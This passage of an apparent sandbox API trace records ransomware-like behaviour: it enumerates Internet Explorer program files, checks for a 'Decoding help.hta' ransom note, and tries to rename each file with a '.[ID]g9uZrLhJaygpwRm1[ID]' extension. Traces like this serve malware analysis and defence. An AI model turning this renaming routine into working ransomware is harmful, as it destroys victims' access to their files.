explorer\\iedvtool.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\iedvtool.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\internet explorer\\iedvtool.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.219] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x51cfd30 | out: lpFindFileData=0x51cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb273d712, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb273d712, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb27fbdf3, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5b200, dwReserved0=0x0, dwReserved1=0x0, cFileName="ieinstal.exe", cAlternateFileName="")) returned 1 [0039.219] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" [0039.219] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned 48 [0039.219] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\Decoding help.hta" [0039.219] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\Decoding help.hta" (normalized: "c:\\program files (x86)\\internet explorer\\decoding help.hta")) returned 0x1 [0039.219] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ieinstal.exe") returned -1 [0039.219] lstrlenW (lpString="ieinstal.exe") returned 12 [0039.219] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" [0039.219] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned 48 [0039.219] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\", lpString2="ieinstal.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\ieinstal.exe") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\ieinstal.exe" [0039.219] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\ieinstal.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\ieinstal.exe") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\ieinstal.exe" [0039.219] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\ieinstal.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\ieinstal.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\ieinstal.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0039.219] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\ieinstal.exe" (normalized: "c:\\program files (x86)\\internet explorer\\ieinstal.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\ieinstal.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\internet explorer\\ieinstal.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.219] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x51cfd30 | out: lpFindFileData=0x51cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb27a3bdc, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0xb27a3bdc, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0x6b1085f0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1c400, dwReserved0=0x0, dwReserved1=0x0, cFileName="ielowutil.exe", cAlternateFileName="")) returned 1 [0039.219] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" [0039.219] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned 48 [0039.219] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\Decoding help.hta" [0039.220] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\Decoding help.hta" (normalized: "c:\\program files (x86)\\internet explorer\\decoding help.hta")) returned 0x1 [0039.220] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ielowutil.exe") returned -1 [0039.220] lstrlenW (lpString="ielowutil.exe") returned 13 [0039.220] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" [0039.220] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned 48 [0039.220] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\", lpString2="ielowutil.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\ielowutil.exe") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\ielowutil.exe" [0039.220] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\ielowutil.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\ielowutil.exe") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\ielowutil.exe" [0039.220] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\ielowutil.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\ielowutil.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\ielowutil.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0039.220] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\ielowutil.exe" (normalized: "c:\\program files (x86)\\internet explorer\\ielowutil.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\ielowutil.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\internet explorer\\ielowutil.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.220] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x51cfd30 | out: lpFindFileData=0x51cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb23391ea, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb23391ea, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb23854ab, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x27e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ieproxy.dll", cAlternateFileName="")) returned 1 [0039.220] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" [0039.220] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned 48 [0039.220] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\Decoding help.hta" [0039.220] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\Decoding help.hta" (normalized: "c:\\program files (x86)\\internet explorer\\decoding help.hta")) returned 0x1 [0039.220] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ieproxy.dll") returned -1 [0039.220] lstrlenW (lpString="ieproxy.dll") returned 11 [0039.220] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" [0039.220] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned 48 [0039.220] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\", lpString2="ieproxy.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\ieproxy.dll") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\ieproxy.dll" [0039.220] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\ieproxy.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\ieproxy.dll") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\ieproxy.dll" [0039.220] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\ieproxy.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\ieproxy.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\ieproxy.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.220] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\ieproxy.dll" (normalized: "c:\\program files (x86)\\internet explorer\\ieproxy.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\ieproxy.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\internet explorer\\ieproxy.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.221] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x51cfd30 | out: lpFindFileData=0x51cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb27fbdf3, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb27fbdf3, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb27fbdf3, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x31000, dwReserved0=0x0, dwReserved1=0x0, cFileName="IEShims.dll", cAlternateFileName="")) returned 1 [0039.221] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" [0039.221] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned 48 [0039.221] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\Decoding help.hta" [0039.221] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\Decoding help.hta" (normalized: "c:\\program files (x86)\\internet explorer\\decoding help.hta")) returned 0x1 [0039.221] lstrcmpiW (lpString1="Decoding help.hta", lpString2="IEShims.dll") returned -1 [0039.221] lstrlenW (lpString="IEShims.dll") returned 11 [0039.221] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" [0039.221] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned 48 [0039.221] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\", lpString2="IEShims.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\IEShims.dll") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\IEShims.dll" [0039.221] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\IEShims.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\IEShims.dll") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\IEShims.dll" [0039.221] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\IEShims.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\IEShims.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\IEShims.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.221] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\IEShims.dll" (normalized: "c:\\program files (x86)\\internet explorer\\ieshims.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\IEShims.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\internet explorer\\ieshims.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.221] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x51cfd30 | out: lpFindFileData=0x51cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2e87a7f, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb2e87a7f, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb2eadbdf, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xa4510, dwReserved0=0x0, dwReserved1=0x0, cFileName="iexplore.exe", cAlternateFileName="")) returned 1 [0039.221] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" [0039.221] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned 48 [0039.221] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\Decoding help.hta" [0039.221] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\Decoding help.hta" (normalized: "c:\\program files (x86)\\internet explorer\\decoding help.hta")) returned 0x1 [0039.221] lstrcmpiW (lpString1="Decoding help.hta", lpString2="iexplore.exe") returned -1 [0039.221] lstrlenW (lpString="iexplore.exe") returned 12 [0039.221] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" [0039.221] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned 48 [0039.221] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\", lpString2="iexplore.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" [0039.221] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" [0039.221] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0039.222] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" (normalized: "c:\\program files (x86)\\internet explorer\\iexplore.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\internet explorer\\iexplore.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.222] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x51cfd30 | out: lpFindFileData=0x51cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2a5d3f7, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb2a5d3f7, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb2aa96b8, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x0, dwReserved1=0x0, cFileName="jsdbgui.dll", cAlternateFileName="")) returned 1 [0039.222] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" [0039.222] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned 48 [0039.222] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\Decoding help.hta" [0039.222] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\Decoding help.hta" (normalized: "c:\\program files (x86)\\internet explorer\\decoding help.hta")) returned 0x1 [0039.222] lstrcmpiW (lpString1="Decoding help.hta", lpString2="jsdbgui.dll") returned -1 [0039.222] lstrlenW (lpString="jsdbgui.dll") returned 11 [0039.222] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" [0039.222] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned 48 [0039.222] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\", lpString2="jsdbgui.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\jsdbgui.dll") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\jsdbgui.dll" [0039.222] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\jsdbgui.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\jsdbgui.dll") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\jsdbgui.dll" [0039.222] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\jsdbgui.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\jsdbgui.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\jsdbgui.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.222] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\jsdbgui.dll" (normalized: "c:\\program files (x86)\\internet explorer\\jsdbgui.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\jsdbgui.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\internet explorer\\jsdbgui.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.222] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x51cfd30 | out: lpFindFileData=0x51cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8d665b0, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0xb8d665b0, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0x97045ab0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1e000, dwReserved0=0x0, dwReserved1=0x0, cFileName="jsdebuggeride.dll", cAlternateFileName="")) returned 1 [0039.222] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" [0039.222] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned 48 [0039.222] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\Decoding help.hta" [0039.222] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\Decoding help.hta" (normalized: "c:\\program files (x86)\\internet explorer\\decoding help.hta")) returned 0x1 [0039.222] lstrcmpiW (lpString1="Decoding help.hta", lpString2="jsdebuggeride.dll") returned -1 [0039.222] lstrlenW (lpString="jsdebuggeride.dll") returned 17 [0039.222] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" [0039.222] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned 48 [0039.223] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\", lpString2="jsdebuggeride.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\jsdebuggeride.dll") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\jsdebuggeride.dll" [0039.223] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\jsdebuggeride.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\jsdebuggeride.dll") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\jsdebuggeride.dll" [0039.223] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\jsdebuggeride.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\jsdebuggeride.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\jsdebuggeride.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.223] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\jsdebuggeride.dll" (normalized: "c:\\program files (x86)\\internet explorer\\jsdebuggeride.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\jsdebuggeride.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\internet explorer\\jsdebuggeride.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.223] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x51cfd30 | out: lpFindFileData=0x51cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8d8c70f, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0xb8d8c70f, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0x97045ab0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1d400, dwReserved0=0x0, dwReserved1=0x0, cFileName="JSProfilerCore.dll", cAlternateFileName="")) returned 1 [0039.223] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" [0039.223] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned 48 [0039.223] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\Decoding help.hta" [0039.223] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\Decoding help.hta" (normalized: "c:\\program files (x86)\\internet explorer\\decoding help.hta")) returned 0x1 [0039.223] lstrcmpiW (lpString1="Decoding help.hta", lpString2="JSProfilerCore.dll") returned -1 [0039.223] lstrlenW (lpString="JSProfilerCore.dll") returned 18 [0039.223] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*" [0039.223] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\*.*") returned 48 [0039.223] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\", lpString2="JSProfilerCore.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\JSProfilerCore.dll") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\JSProfilerCore.dll" [0039.223] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\JSProfilerCore.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\JSProfilerCore.dll") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\JSProfilerCore.dll" [0039.223] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\JSProfilerCore.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\JSProfilerCore.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\JSProfilerCore.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.223] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\JSProfilerCore.dll" (normalized: "c:\\program files (x86)\\internet explorer\\jsprofilercore.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\JSProfilerCore.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\internet explorer\\jsprofilercore.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.233] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x51cfd30 | out: lpFindFileData=0x51cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2aa96b8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb2aa96b8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb2acf818, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, 